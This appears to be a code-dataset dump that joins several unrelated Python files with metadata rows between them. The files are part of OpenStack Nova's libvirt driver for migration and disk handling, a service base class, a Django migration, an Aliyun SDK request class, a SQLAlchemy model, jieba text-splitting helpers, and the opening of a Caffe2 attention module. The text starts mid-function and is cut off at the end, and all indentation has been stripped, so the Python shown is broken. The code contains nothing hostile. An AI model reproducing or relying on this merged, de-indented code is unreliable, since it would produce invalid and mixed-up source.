swap_mb = inst_type['swap']
image.cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=swap_mb * units.Mi,
swap_mb=swap_mb)
else:
image.cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
def post_live_migration(self, context, instance, block_device_info,
migrate_data=None):
# Disconnect from volume server
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self._disconnect_volume(connection_info, disk_dev)
def post_live_migration_at_source(self, context, instance, network_info):
"""Unplug VIFs from networks at source.
:param context: security context
:param instance: instance object reference
:param network_info: instance network information
"""
self.unplug_vifs(instance, network_info)
def post_live_migration_at_destination(self, context,
instance,
network_info,
block_migration=False,
block_device_info=None):
"""Post operation of live migration at destination host.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
:param block_migration: if true, post operation of block_migration.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(
CONF.libvirt.virt_type, instance, block_device_info)
xml = self._get_guest_xml(context, instance,
network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._conn.defineXML(xml)
def _get_instance_disk_info(self, instance_name, xml,
block_device_info=None):
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
volume_devices = set()
for vol in block_device_mapping:
disk_dev = vol['mount_device'].rpartition("/")[2]
volume_devices.add(disk_dev)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
target_nodes = doc.findall('.//devices/disk/target')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
target = target_nodes[cnt].attrib['dev']
if not path:
LOG.debug('skipping disk for %s as it does not have a path',
instance_name)
continue
if disk_type != 'file':
LOG.debug('skipping %s since it looks like volume', path)
continue
if target in volume_devices:
LOG.debug('skipping disk %(path)s (%(target)s) as it is a '
'volume', {'path': path, 'target': target})
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
over_commit_size = int(virt_size) - dk_size
else:
backing_file = ""
virt_size = dk_size
over_commit_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size,
'over_committed_disk_size': over_commit_size})
return jsonutils.dumps(disk_info)
def get_instance_disk_info(self, instance_name,
block_device_info=None):
try:
dom = self._lookup_by_name(instance_name)
xml = dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = (_('Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] '
'%(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
return self._get_instance_disk_info(instance_name, xml,
block_device_info)
def _get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
# Disk size that all instance uses : virtual_size - disk_size
disk_over_committed_size = 0
for dom in self._list_instance_domains():
try:
xml = dom.XMLDesc(0)
disk_infos = jsonutils.loads(
self._get_instance_disk_info(dom.name(), xml))
for info in disk_infos:
disk_over_committed_size += int(
info['over_committed_disk_size'])
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
LOG.warn(_LW(
'Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] %(ex)s'
) % {'instance_name': dom.name(),
'error_code': error_code,
'ex': ex})
except OSError as e:
if e.errno == errno.ENOENT:
LOG.warn(_LW('Periodic task is updating the host stat, '
'it is trying to get disk %(i_name)s, '
'but disk file was removed by concurrent '
'operations such as resize.'),
{'i_name': dom.name()})
if e.errno == errno.EACCES:
LOG.warn(_LW('Periodic task is updating the host stat, '
'it is trying to get disk %(i_name)s, '
'but access is denied. It is most likely '
'due to a VM that exists on the compute '
'node but is not managed by Nova.'),
{'i_name': dom.name()})
else:
raise
# NOTE(gtt116): give other tasks a chance.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_cpu_stats(self):
"""Return the current CPU state of the host."""
# Extract node's CPU statistics.
stats = self._conn.getCPUStats(libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._conn.getInfo()[3]
return stats
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
# NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.update(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize,
shared_storage=False):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
if not shared_storage:
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def _is_storage_shared_with(self, dest, inst_base):
# NOTE (rmk): There are two methods of determining whether we are
# on the same filesystem: the source and dest IP are the
# same, or we create a file on the dest system via SSH
# and check whether the source system can also see it.
shared_storage = (dest == self.get_host_ip_addr())
if not shared_storage:
tmp_file = uuid.uuid4().hex + '.tmp'
tmp_path = os.path.join(inst_base, tmp_file)
try:
utils.execute('ssh', dest, 'touch', tmp_path)
if os.path.exists(tmp_path):
shared_storage = True
os.unlink(tmp_path)
else:
utils.execute('ssh', dest, 'rm', tmp_path)
except Exception:
pass
return shared_storage
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None):
LOG.debug("Starting migrate_disk_and_power_off",
instance=instance)
# Checks if the migration needs a disk resize down.
for kind in ('root_gb', 'ephemeral_gb'):
if flavor[kind] < instance[kind]:
reason = _("Unable to resize disk down.")
raise exception.InstanceFaultRollback(
exception.ResizeError(reason=reason))
disk_info_text = self.get_instance_disk_info(instance['name'],
block_device_info=block_device_info)
disk_info = jsonutils.loads(disk_info_text)
# NOTE(dgenin): Migration is not implemented for LVM backed instances.
if (CONF.libvirt.images_type == 'lvm' and
not self._is_booted_from_volume(instance, disk_info_text)):
reason = "Migration is not supported for LVM backed instances"
raise exception.MigrationPreCheckError(reason)
# copy disks to destination
# rename instance dir to +_resize at first for using
# shared storage for instance dir (eg. NFS).
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
shared_storage = self._is_storage_shared_with(dest, inst_base)
# try to create the directory on the remote compute node
# if this fails we pass the exception up the stack so we can catch
# failures here earlier
if not shared_storage:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
self.power_off(instance)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self._disconnect_volume(connection_info, disk_dev)
try:
utils.execute('mv', inst_base, inst_base_resize)
# if we are migrating the instance with shared storage then
# create the directory. If it is a remote node the directory
# has already been created
if shared_storage:
dest = None
utils.execute('mkdir', '-p', inst_base)
active_flavor = flavors.extract_flavor(instance)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if (fname == 'disk.swap' and
active_flavor.get('swap', 0) != flavor.get('swap', 0)):
# To properly resize the swap partition, it must be
# re-created with the proper size. This is acceptable
# because when an OS is shut down, the contents of the
# swap space are just garbage, the OS doesn't bother about
# what is in it.
# We will not copy over the swap disk here, and rely on
# finish_migration/_create_image to re-create it for us.
continue
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if shared_storage:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize,
shared_storage)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance running successfully."), instance=instance)
raise loopingcall.LoopingCallDone()
@staticmethod
def _disk_size_from_instance(instance, info):
"""Determines the disk size from instance properties
Returns the disk size by using the disk name to determine whether it
is a root or an ephemeral disk, then by checking properties of the
instance returns the size converted to bytes.
Returns 0 if the disk name not match (disk, disk.local).
"""
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
return size * units.Gi
@staticmethod
def _disk_raw_to_qcow2(path):
"""Converts a raw disk to qcow2."""
path_qcow = path + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', path, path_qcow)
utils.execute('mv', path_qcow, path)
@staticmethod
def _disk_qcow2_to_raw(path):
"""Converts a qcow2 disk to raw."""
path_raw = path + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', path, path_raw)
utils.execute('mv', path_raw, path)
def _disk_resize(self, info, size):
"""Attempts to resize a disk to size
Attempts to resize a disk by checking the capabilities and
preparing the format, then calling disk.api.extend.
Note: Currently only support disk extend.
"""
# If we have a non partitioned image that we can extend
# then ensure we're in 'raw' format so we can extend file system.
fmt = info['type']
pth = info['path']
if (size and fmt == 'qcow2' and
disk.can_resize_image(pth, size) and
disk.is_image_partitionless(pth, use_cow=True)):
self._disk_qcow2_to_raw(pth)
fmt = 'raw'
if size:
use_cow = fmt == 'qcow2'
disk.extend(pth, size, use_cow=use_cow)
if fmt == 'raw' and CONF.use_cow_images:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
self._disk_raw_to_qcow2(pth)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
LOG.debug("Starting finish_migration", instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
size = self._disk_size_from_instance(instance, info)
self._disk_resize(info, size)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
# assume _create_image do nothing if a target file exists.
self._create_image(context, instance,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None, inject_files=False)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert.
"""
try:
shutil.rmtree(inst_base)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
LOG.debug("Starting finish_revert_migration",
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
def get_diagnostics(self, instance):
def get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = get_io_devices(xml)
for guest_disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(guest_disk)
output[guest_disk + "_read_req"] = stats[0]
output[guest_disk + "_read"] = stats[1]
output[guest_disk + "_write_req"] = stats[2]
output[guest_disk + "_write"] = stats[3]
output[guest_disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
LOG.debug('Checking instance files accessibility %s', instance_path)
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
def _delete_instance_files(self, instance):
# NOTE(mikal): a shim to handle this file not using instance objects
# everywhere. Remove this when that conversion happens.
context = nova_context.get_admin_context(read_deleted='yes')
inst_obj = objects.Instance.get_by_uuid(context, instance['uuid'])
# NOTE(mikal): this code should be pushed up a layer when this shim is
# removed.
attempts = int(inst_obj.system_metadata.get('clean_attempts', '0'))
success = self.delete_instance_files(inst_obj)
inst_obj.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
inst_obj.cleaned = True
inst_obj.save(context)
def delete_instance_files(self, instance):
target = libvirt_utils.get_instance_path(instance)
# A resize may be in progress
target_resize = target + '_resize'
# Other threads may attempt to rename the path, so renaming the path
# to target + '_del' (because it is atomic) and iterating through
# twice in the unlikely event that a concurrent rename occurs between
# the two rename attempts in this method. In general this method
# should be fairly thread-safe without these additional checks, since
# other operations involving renames are not permitted when the task
# state is not None and the task state should be set to something
# other than None by the time this method is invoked.
target_del = target + '_del'
for i in six.moves.range(2):
try:
utils.execute('mv', target, target_del)
break
except Exception:
pass
try:
utils.execute('mv', target_resize, target_del)
break
except Exception:
pass
# Either the target or target_resize path may still exist if all
# rename attempts failed.
remaining_path = None
for p in (target, target_resize):
if os.path.exists(p):
remaining_path = p
break
# A previous delete attempt may have been interrupted, so target_del
# may exist even if all rename attempts during the present method
# invocation failed due to the absence of both target and
# target_resize.
if not remaining_path and os.path.exists(target_del):
LOG.info(_LI('Deleting instance files %s'), target_del,
instance=instance)
remaining_path = target_del
try:
shutil.rmtree(target_del)
except OSError as e:
LOG.error(_LE('Failed to cleanup directory %(target)s: '
'%(e)s'), {'target': target_del, 'e': e},
instance=instance)
# It is possible that the delete failed, if so don't mark the instance
# as cleaned.
if remaining_path and os.path.exists(remaining_path):
LOG.info(_LI('Deletion of %s failed'), remaining_path,
instance=instance)
return False
LOG.info(_LI('Deletion of %s complete'), target_del, instance=instance)
return True
@property
def need_legacy_block_device_info(self):
return False
def default_root_device_name(self, instance, image_meta, root_bdm):
disk_bus = blockinfo.get_disk_bus_for_device_type(
CONF.libvirt.virt_type, image_meta, "disk")
cdrom_bus = blockinfo.get_disk_bus_for_device_type(
CONF.libvirt.virt_type, image_meta, "cdrom")
root_info = blockinfo.get_root_info(
CONF.libvirt.virt_type, image_meta, root_bdm, disk_bus,
cdrom_bus)
return block_device.prepend_dev(root_info['dev'])
def default_device_names_for_instance(self, instance, root_device_name,
*block_device_lists):
ephemerals, swap, block_device_mapping = block_device_lists[:3]
blockinfo.default_device_names(CONF.libvirt.virt_type,
nova_context.get_admin_context(),
instance, root_device_name,
ephemerals, swap,
block_device_mapping)
def is_supported_fs_format(self, fs_type):
return fs_type in [disk.FS_FORMAT_EXT2, disk.FS_FORMAT_EXT3,
disk.FS_FORMAT_EXT4, disk.FS_FORMAT_XFS]
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
if refresh or not self._stats:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = (self.driver.
_get_disk_over_committed_size_total())
# Disk available least size
available_least = disk_free_gb * units.Gi - disk_over_committed
return (available_least / units.Gi)
LOG.debug("Updating host stats")
disk_info_dict = self.driver._get_local_gb_info()
data = {}
# NOTE(dprince): calling capabilities before getVersion works around
# an initialization issue with some versions of Libvirt (1.0.5.5).
# See: https://bugzilla.redhat.com/show_bug.cgi?id=1000116
# See: https://bugs.launchpad.net/nova/+bug/1215593
data["supported_instances"] = \
self.driver._get_instance_capabilities()
data["vcpus"] = self.driver._get_vcpu_total()
data["memory_mb"] = self.driver._get_memory_mb_total()
data["local_gb"] = disk_info_dict['total']
data["vcpus_used"] = self.driver._get_vcpu_used()
data["memory_mb_used"] = self.driver._get_memory_mb_used()
data["local_gb_used"] = disk_info_dict['used']
data["hypervisor_type"] = self.driver._get_hypervisor_type()
data["hypervisor_version"] = self.driver._get_hypervisor_version()
data["hypervisor_hostname"] = self.driver._get_hypervisor_hostname()
data["cpu_info"] = self.driver._get_cpu_info()
data['disk_available_least'] = _get_disk_available_least()
data['pci_passthrough_devices'] = \
self.driver._get_pci_passthrough_devices()
self._stats = data
return data
| 43.114281 | 79 | 0.568124 | [
"Apache-2.0"
] | srajag/nova | nova/virt/libvirt/driver.py | 244,846 | Python |
# Copyright 2018 Braxton Mckee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import object_database
class ServiceRuntimeConfig:
def __init__(self, serviceTemporaryStorageRoot, authToken, ownIpAddress):
self.serviceTemporaryStorageRoot = serviceTemporaryStorageRoot
self.authToken = authToken
self.ownIpAddress = ownIpAddress
class ServiceBase:
coresUsed = 1
gbRamUsed = 1
def __init__(self, db, serviceObject, runtimeConfig):
self.db = db
self.serviceObject = serviceObject
self.runtimeConfig = runtimeConfig
if self.serviceObject is not None:
self.serializationContext = self.serviceObject.getSerializationContext()
else:
self.serializationContext = None
@staticmethod
def configureFromCommandline(db, serviceObject, args):
"""Subclasses should take the remaining args from the commandline and configure using them"""
pass
def initialize(self):
pass
def doWork(self, shouldStop):
# subclasses actually do work in here.
shouldStop.wait()
@staticmethod
def serviceDisplay(serviceObject, instance=None, objType=None, queryArgs=None):
return object_database.web.cells.Card("No details provided for service '%s'" % serviceObject.name)
@staticmethod
def serviceHeaderToggles(serviceObject, instance=None):
return []
| 32.813559 | 106 | 0.710744 | [
"Apache-2.0"
] | braxtonmckee/nativepython | object_database/service_manager/ServiceBase.py | 1,936 | Python |
# Generated by Django 2.0.5 on 2018-12-04 13:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('branch', '0007_auto_20181204_2034'),
]
operations = [
migrations.AddField(
model_name='authentication',
name='sty',
field=models.CharField(default=0, max_length=3),
preserve_default=False,
),
]
| 21.7 | 60 | 0.601382 | [
"Apache-2.0"
] | 106626/Practical | Demo/branch/migrations/0008_authentication_sty.py | 434 | Python |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdyplsapi.endpoint import endpoint_data
class BindAxnRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Dyplsapi', '2017-05-25', 'BindAxn')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self): # Long
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self, ResourceOwnerId): # Long
self.add_query_param('ResourceOwnerId', ResourceOwnerId)
def get_CallDisplayType(self): # Integer
return self.get_query_params().get('CallDisplayType')
def set_CallDisplayType(self, CallDisplayType): # Integer
self.add_query_param('CallDisplayType', CallDisplayType)
def get_CallTimeout(self): # Integer
return self.get_query_params().get('CallTimeout')
def set_CallTimeout(self, CallTimeout): # Integer
self.add_query_param('CallTimeout', CallTimeout)
def get_PhoneNoX(self): # String
return self.get_query_params().get('PhoneNoX')
def set_PhoneNoX(self, PhoneNoX): # String
self.add_query_param('PhoneNoX', PhoneNoX)
def get_RingConfig(self): # String
return self.get_query_params().get('RingConfig')
def set_RingConfig(self, RingConfig): # String
self.add_query_param('RingConfig', RingConfig)
def get_ASRStatus(self): # Boolean
return self.get_query_params().get('ASRStatus')
def set_ASRStatus(self, ASRStatus): # Boolean
self.add_query_param('ASRStatus', ASRStatus)
def get_PhoneNoB(self): # String
return self.get_query_params().get('PhoneNoB')
def set_PhoneNoB(self, PhoneNoB): # String
self.add_query_param('PhoneNoB', PhoneNoB)
def get_PhoneNoA(self): # String
return self.get_query_params().get('PhoneNoA')
def set_PhoneNoA(self, PhoneNoA): # String
self.add_query_param('PhoneNoA', PhoneNoA)
def get_ExpectCity(self): # String
return self.get_query_params().get('ExpectCity')
def set_ExpectCity(self, ExpectCity): # String
self.add_query_param('ExpectCity', ExpectCity)
def get_ResourceOwnerAccount(self): # String
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self, ResourceOwnerAccount): # String
self.add_query_param('ResourceOwnerAccount', ResourceOwnerAccount)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
def get_OutOrderId(self): # String
return self.get_query_params().get('OutOrderId')
def set_OutOrderId(self, OutOrderId): # String
self.add_query_param('OutOrderId', OutOrderId)
def get_PoolKey(self): # String
return self.get_query_params().get('PoolKey')
def set_PoolKey(self, PoolKey): # String
self.add_query_param('PoolKey', PoolKey)
def get_Expiration(self): # String
return self.get_query_params().get('Expiration')
def set_Expiration(self, Expiration): # String
self.add_query_param('Expiration', Expiration)
def get_IsRecordingEnabled(self): # Boolean
return self.get_query_params().get('IsRecordingEnabled')
def set_IsRecordingEnabled(self, IsRecordingEnabled): # Boolean
self.add_query_param('IsRecordingEnabled', IsRecordingEnabled)
def get_OutId(self): # String
return self.get_query_params().get('OutId')
def set_OutId(self, OutId): # String
self.add_query_param('OutId', OutId)
def get_NoType(self): # String
return self.get_query_params().get('NoType')
def set_NoType(self, NoType): # String
self.add_query_param('NoType', NoType)
def get_ASRModelId(self): # String
return self.get_query_params().get('ASRModelId')
def set_ASRModelId(self, ASRModelId): # String
self.add_query_param('ASRModelId', ASRModelId)
def get_CallRestrict(self): # String
return self.get_query_params().get('CallRestrict')
def set_CallRestrict(self, CallRestrict): # String
self.add_query_param('CallRestrict', CallRestrict)
| 38.317829 | 74 | 0.752377 | [
"Apache-2.0"
] | Explorer1092/aliyun-openapi-python-sdk | aliyun-python-sdk-dyplsapi/aliyunsdkdyplsapi/request/v20170525/BindAxnRequest.py | 4,943 | Python |
from sqlalchemy import Boolean, Column, ForeignKey, Integer, String, DateTime, LargeBinary, Float, UniqueConstraint
from sqlalchemy.orm import relationship, backref
from datetime import datetime
from conductor.app.db.base_class import Base
class DiscoveryResult(Base):
__tablename__ = "discovery_results"
__table_args__ = (
# this can be db.PrimaryKeyConstraint if you want it to be a primary key
UniqueConstraint('train_id', 'station_id'),
)
id = Column(Integer, primary_key=True, index=True)
train_id = Column(Integer, ForeignKey("trains.id"))
station_id = Column(Integer, ForeignKey("stations.id"))
results = Column(String)
created_at = Column(DateTime, default=datetime.now())
| 38.526316 | 115 | 0.741803 | [
"MIT"
] | PHT-EU/central-conductor | conductor/app/models/discovery.py | 732 | Python |
import re
import jieba
import jieba.posseg as pseg
def split2sens(text):
pstop = re.compile(rf'[。!??!…]”*')
sens = []
stoplist = pstop.findall(text)
senlist = []
for sen in pstop.split(text):
if len(sen) == 0:
continue
senlist.append(sen)
for i, sen in enumerate(senlist):
try:
sen = sen + stoplist[i]
sens.append(sen)
except IndexError:
continue
return sens
def cut2words(text):
return jieba.lcut(text)
def cut2wpos(text, pos=None):
data = []
for w,p in pseg.cut(text):
if p == pos:
continue
data.append((w,p))
return data
| 20.029412 | 38 | 0.543319 | [
"MIT"
] | fcoolish/All4NLP | nbt/splittext/splittext.py | 691 | Python |
## @package attention
# Module caffe2.python.attention
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
class AttentionType:
Regular, Recurrent = range(2)
def s(scope, name):
# We have to manually scope due to our internal/external blob
# relationships.
return "{}/{}".format(str(scope), str(name))
# c_i = \sum_j w_{ij}\textbf{s}_j
def _calc_weighted_context(
model,
encoder_outputs_transposed,
encoder_output_dim,
attention_weights_3d,
scope,
):
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = model.net.BatchMatMul(
[encoder_outputs_transposed, attention_weights_3d],
s(scope, 'attention_weighted_encoder_context'),
)
# TODO: somehow I cannot use Squeeze in-place op here
# [batch_size, encoder_output_dim]
attention_weighted_encoder_context, _ = model.net.Reshape(
attention_weighted_encoder_context,
[
attention_weighted_encoder_context,
s(scope, 'attention_weighted_encoder_context_old_shape'),
],
shape=[1, -1, encoder_output_dim],
)
return attention_weighted_encoder_context
# Calculate a softmax over the passed in attention energy logits
def _calc_attention_weights(
model,
attention_logits_transposed,
scope,
):
# TODO: we could try to force some attention weights to be zeros,
# based on encoder_lengths.
# [batch_size, encoder_length]
attention_weights = model.Softmax(
attention_logits_transposed,
s(scope, 'attention_weights'),
engine='CUDNN',
)
# TODO: make this operation in-place
# [batch_size, encoder_length, 1]
attention_weights_3d = model.net.ExpandDims(
attention_weights,
s(scope, 'attention_weights_3d'),
dims=[2],
)
return attention_weights_3d
# e_{ij} = \textbf{v}^T tanh \alpha(\textbf{h}_{i-1}, \textbf{s}_j)
def _calc_attention_logits_from_sum_match(
model,
decoder_hidden_encoder_outputs_sum,
encoder_output_dim,
scope,
):
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Tanh(
decoder_hidden_encoder_outputs_sum,
decoder_hidden_encoder_outputs_sum,
)
attention_v = model.param_init_net.XavierFill(
[],
s(scope, 'attention_v'),
shape=[1, encoder_output_dim],
)
model.add_param(attention_v)
attention_zeros = model.param_init_net.ConstantFill(
[],
s(scope, 'attention_zeros'),
value=0.0,
shape=[1],
)
# [encoder_length, batch_size, 1]
attention_logits = model.net.FC(
[decoder_hidden_encoder_outputs_sum, attention_v, attention_zeros],
[s(scope, 'attention_logits')],
axis=2,
)
# [encoder_length, batch_size]
attention_logits = model.net.Squeeze(
[attention_logits],
[attention_logits],
dims=[2],
)
# [batch_size, encoder_length]
attention_logits_transposed = model.Transpose(
attention_logits,
s(scope, 'attention_logits_transposed'),
axes=[1, 0],
